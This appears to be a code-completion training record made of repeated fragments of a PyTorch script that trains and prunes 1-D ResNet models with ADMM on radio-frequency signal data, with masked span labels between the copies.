zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
elif args.combine_progressive:
print("progressive admm-train/re-train masking")
masks = {}
for name, W in (model.named_parameters()):
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# adjust learning rate
if args.admm:
admm.admm_adjust_learning_rate(optimizer, epoch, args)
else:
scheduler.step()
input=input.float()
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
if args.mixup:
input, target_a, target_b, lam = mixup_data(input, target, args.alpha)
# compute output
output = model(input)
if args.mixup:
ce_loss = mixup_criterion(criterion, output, target_a, target_b, lam, args.smooth)
else:
ce_loss = criterion(output, target, smooth=args.smooth)
if args.admm:
admm.z_u_update(args, ADMM, model, device, train_loader, optimizer, epoch, input, i, writer) # update Z and U variables
ce_loss, admm_loss, mixed_loss = admm.append_admm_loss(args, ADMM, model, ce_loss) # append admm losss
# measure accuracy and record loss
acc1,_ = accuracy(output, target, topk=(1,5))
losses.update(ce_loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
if args.admm:
mixed_loss.backward()
else:
ce_loss.backward()
if args.combine_progressive:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
if args.masked_retrain:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print(i)
if i % args.log_interval == 0:
for param_group in optimizer.param_groups:
current_lr = param_group['lr']
print('({0}) lr:[{1:.5f}] '
'Epoch: [{2}][{3}/{4}]\t'
'Status: admm-[{5}] retrain-[{6}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f}% ({top1.avg:.3f}%)\t'
.format(args.optmzr, current_lr,
epoch, i, len(train_loader), args.admm, args.masked_retrain, batch_time=data_time, loss=losses, top1=top1))
if i % 100 == 0:
idx_loss_dict[i] = losses.avg
return idx_loss_dict
def test(model, criterion, test_loader):
model.eval()
losses = AverageMeter()
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
output = model(data)
loss = criterion(output, target)
losses.update(loss.item(), data.size(0))
# test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
print('\nTest set loss: {:.4f}, * Acc@1: {}/{} ({:.2f}%)\n'.format(
losses.avg, correct, len(test_loader.dataset),
100. * float(correct) / float(len(test_loader.dataset))))
return losses.avg, (100. * float(correct) / float(len(test_loader.dataset)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def convert_secs2time(epoch_time):
need_hour = int(epoch_time / 3600)
need_mins = int((epoch_time - 3600*need_hour) / 60)
need_secs = int(epoch_time - 3600*need_hour - 60*need_mins)
return need_hour, need_mins, need_secs
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.3 ** (epoch // args.lr_decay))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
start_time = time.time()
main()
duration = time.time() - start_time
need_hour, need_mins, need_secs = convert_secs2time(duration)
print('total runtime: {:02d}:{:02d}:{:02d}'.format(need_hour, need_mins, need_secs))
| masked_retrain | identifier_name |
main.py | from __future__ import print_function
import os
import sys
import logging
import argparse
import time
from time import strftime
import torch
import torch.optim as optim
from torchvision import datasets, transforms
from models.resnet_1d import ResNet18_1d, ResNet34_1d, ResNet50_1d
import admm
from admm import GradualWarmupScheduler
from admm import CrossEntropyLossMaybeSmooth
from admm import mixup_data, mixup_criterion
from testers import *
from TrainValTest import TrainValTest
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def check_and_create(dir_path):
if os.path.exists(dir_path):
return True
else:
os.makedirs(dir_path)
return False
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 admm training')
parser.add_argument('--logger', action='store_true', default=True,
help='whether to use logger')
parser.add_argument('--arch', type=str, default=None,
help='[vgg, resnet, convnet, alexnet]')
parser.add_argument('--depth', default=None, type=int,
help='depth of the neural network, 16,19 for vgg; 18, 50 for resnet')
parser.add_argument('--s', type=float, default=0.0001,
help='scale sparse rate (default: 0.0001)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--multi-gpu', action='store_true', default=False,
help='for multi-gpu training')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 160)')
parser.add_argument('--admm-epochs', type=int, default=1, metavar='N',
help='number of interval epochs to update admm (default: 1)')
parser.add_argument('--optmzr', type=str, default='sgd', metavar='OPTMZR',
help='optimizer used (default: adam)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--lr-decay', type=int, default=30, metavar='LR_decay',
help='how many every epoch before lr drop (default: 30)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--load-model', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--load-mask', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--save-model', type=str, default="",
help='For Saving the current Model')
parser.add_argument('--masked-retrain', action='store_true', default=False,
help='for masked retrain')
parser.add_argument('--verbose', action='store_true', default=True,
help='whether to report admm convergence condition')
parser.add_argument('--admm', action='store_true', default=False,
help="for admm training")
parser.add_argument('--rho', type=float, default = 0.0001,
help ="define rho for ADMM")
parser.add_argument('--rho-num', type=int, default = 5,
help ="define how many rohs for ADMM training")
parser.add_argument('--sparsity-type', type=str, default='random-pattern',
help ="define sparsity_type: [irregular,column,filter,pattern,random-pattern]")
parser.add_argument('--config-file', type=str, default='config_vgg16',
help ="config file name")
parser.add_argument('--combine-progressive', default=False, type=str2bool,
help="for filter pruning after column pruning")
parser.add_argument('--purification', default=False, type=str2bool,
help="purification after pruning")
parser.add_argument('--lr-scheduler', type=str, default='default',
help='define lr scheduler')
parser.add_argument('--warmup', action='store_true', default=False,
help='warm-up scheduler')
parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='M',
help='warmup-lr, smaller than original lr')
parser.add_argument('--warmup-epochs', type=int, default=0, metavar='M',
help='number of epochs for lr warmup')
parser.add_argument('--mixup', action='store_true', default=False,
help='ce mixup')
parser.add_argument('--alpha', type=float, default=0.0, metavar='M',
help='for mixup training, lambda = Beta(alpha, alpha) distribution. Set to 0.0 to disable')
parser.add_argument('--smooth', action='store_true', default=False,
help='lable smooth')
parser.add_argument('--smooth-eps', type=float, default=0.0, metavar='M',
help='smoothing rate [0.0, 1.0], set to 0.0 to disable')
parser.add_argument('--no-tricks', action='store_true', default=False,
help='disable all training tricks and restore original classic training process')
########### From RFMLS: multi-gpu; batch-size
parser.add_argument('--exp_name', default='exp1', type=str, help='Specify the experiment name')
parser.add_argument('--base_path', default='/scratch/RFMLS/dataset100/dataset_with_val_9000train/', type=str, help='Specify the base path')
parser.add_argument('--save_path', default='/scratch/zhou.fan1/filtered/', type=str, help='Specify the save path')
parser.add_argument('--file_type', default='mat', type=str, help='Specify type of file you want to read')
parser.add_argument('--decimated', default=False, type=str2bool, help='Specify if the data in the files is decimated, if so and you are using the same stats file as the undecimated then the generator will take this into account')
parser.add_argument('--val_from_train', default=False, type=str2bool, help='If validation not present in partition file, generate one from the training set. (If false, use test set as validation)')
parser.add_argument('--test_on_val_set',default=False, type=str2bool, help='If true it will test the trained model on validation data, for tuning hyperparameters')
parser.add_argument('--train', default=False, type=str2bool, help='Specify doing training or not')
parser.add_argument('-ss', '--slice_size', default=1024, type=int, help='Specify the slice size')
parser.add_argument('-d', '--devices', default=100, type=int, help='Specify the number of total devices')
parser.add_argument('--cnn_stack', default=3, type=int, help='[Baseline Model] Specify the number of cnn layers')
parser.add_argument('--fc_stack', default=2, type=int, help='[Baseline Model] Specify the number of fc layers')
parser.add_argument('--channels', default=128, type=int, help='[Baseline Model] Specify the number of channels of cnn')
parser.add_argument('--fc1', default=256, type=int, help='[Baseline Model] Specify the number of neurons in the first fc layer')
parser.add_argument('--fc2', default=128, type=int, help='[Baseline Model] Specify the number of neurons in the penultimate fc layer')
# Data Generator
parser.add_argument('--generator', default='new', type=str, help='Specify which generator to use')
parser.add_argument('--add_padding', default=False, type=str2bool, help='If examples are smaller than slice size addpadding')
parser.add_argument('--padding_type', default='zero', type=str, help='"zero"-padding and "stride"-padding')
parser.add_argument('--try_concat', default=False, type=str2bool, help='If examples are smaller than slice size and using demodulated data, try and concat them')
parser.add_argument('--preprocessor', default='no', type=str, help='Specify which preprocessor to use')
parser.add_argument('--K', default=1, type=int, help='Specify the batch down sampling factor K')
parser.add_argument('-fpio', '--files_per_IO', default=500000, type = int, help='Specify the files loaded to memory per IO')
parser.add_argument('--shrink', default=1, type=float, help='Dataset down sampling factor')
parser.add_argument('--normalize', default='True', type=str2bool, help='Specify if you want to normalize the data using mean and std in stats files (if stats does not have this info, it is ignored)')
parser.add_argument('--crop', default=0, type=int, help='if crop > 0 the generator crops the examples to a maximum length of crop')
parser.add_argument('--training_strategy', default='big', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--sampling', default='model', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--fir_size', default=11, type=int, help='FIR filter size.')
parser.add_argument('--use_preamble', default=False, type=str2bool, help='Using preamble to train channel-removing filter')
parser.add_argument('--merge_preamble', default=False, type=str2bool, help='Merge preamble with slice to train channel-removing filter')
parser.add_argument('--id_gpu', default=0, type=int, help='If --multigpu=False, this arguments specify which gpu to use.')
parser.add_argument('--test_stride', default=16, type=int, help='Specify the stride to use for testing')
parser.add_argument('--per_example_strategy', default='prob_sum', type=str, help='Specify the strategy used to compute the per wxample accuracy: (majority, prob_sum, log_prob_sum, all)')
################## augmentation parameters #####################
parser.add_argument('--aug_var', default='0.0434', type=float, help='variance of noise for data augmentation')
parser.add_argument('--aug_mean', default='0.045', type=float, help='mean of noise for data augmentation')
parser.add_argument('--aug_taps', default=11, type=int, help='Number of complex taps for data augmentation')
parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho))
train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def masked_retrain(initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
elif args.combine_progressive:
print("progressive admm-train/re-train masking")
masks = {}
for name, W in (model.named_parameters()):
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# adjust learning rate
if args.admm:
admm.admm_adjust_learning_rate(optimizer, epoch, args)
else:
scheduler.step()
input=input.float()
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
if args.mixup:
input, target_a, target_b, lam = mixup_data(input, target, args.alpha)
# compute output
output = model(input)
if args.mixup:
ce_loss = mixup_criterion(criterion, output, target_a, target_b, lam, args.smooth)
else:
ce_loss = criterion(output, target, smooth=args.smooth)
if args.admm:
admm.z_u_update(args, ADMM, model, device, train_loader, optimizer, epoch, input, i, writer) # update Z and U variables
ce_loss, admm_loss, mixed_loss = admm.append_admm_loss(args, ADMM, model, ce_loss) # append admm losss
# measure accuracy and record loss
acc1,_ = accuracy(output, target, topk=(1,5))
losses.update(ce_loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
if args.admm:
mixed_loss.backward()
else:
ce_loss.backward()
if args.combine_progressive:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
if args.masked_retrain:
with torch.no_grad():
for name, W in (model.named_parameters()):
|
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print(i)
if i % args.log_interval == 0:
for param_group in optimizer.param_groups:
current_lr = param_group['lr']
print('({0}) lr:[{1:.5f}] '
'Epoch: [{2}][{3}/{4}]\t'
'Status: admm-[{5}] retrain-[{6}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f}% ({top1.avg:.3f}%)\t'
.format(args.optmzr, current_lr,
epoch, i, len(train_loader), args.admm, args.masked_retrain, batch_time=data_time, loss=losses, top1=top1))
if i % 100 == 0:
idx_loss_dict[i] = losses.avg
return idx_loss_dict
def test(model, criterion, test_loader):
model.eval()
losses = AverageMeter()
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
output = model(data)
loss = criterion(output, target)
losses.update(loss.item(), data.size(0))
# test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
print('\nTest set loss: {:.4f}, * Acc@1: {}/{} ({:.2f}%)\n'.format(
losses.avg, correct, len(test_loader.dataset),
100. * float(correct) / float(len(test_loader.dataset))))
return losses.avg, (100. * float(correct) / float(len(test_loader.dataset)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def convert_secs2time(epoch_time):
need_hour = int(epoch_time / 3600)
need_mins = int((epoch_time - 3600*need_hour) / 60)
need_secs = int(epoch_time - 3600*need_hour - 60*need_mins)
return need_hour, need_mins, need_secs
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.3 ** (epoch // args.lr_decay))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
start_time = time.time()
main()
duration = time.time() - start_time
need_hour, need_mins, need_secs = convert_secs2time(duration)
print('total runtime: {:02d}:{:02d}:{:02d}'.format(need_hour, need_mins, need_secs))
| if name in masks:
W.grad *= masks[name] | conditional_block |
main.py | from __future__ import print_function
import os
import sys
import logging
import argparse
import time
from time import strftime
import torch
import torch.optim as optim
from torchvision import datasets, transforms
from models.resnet_1d import ResNet18_1d, ResNet34_1d, ResNet50_1d
import admm
from admm import GradualWarmupScheduler
from admm import CrossEntropyLossMaybeSmooth
from admm import mixup_data, mixup_criterion
from testers import *
from TrainValTest import TrainValTest
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def check_and_create(dir_path):
if os.path.exists(dir_path):
return True
else:
os.makedirs(dir_path)
return False
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 admm training')
parser.add_argument('--logger', action='store_true', default=True,
help='whether to use logger')
parser.add_argument('--arch', type=str, default=None,
help='[vgg, resnet, convnet, alexnet]')
parser.add_argument('--depth', default=None, type=int,
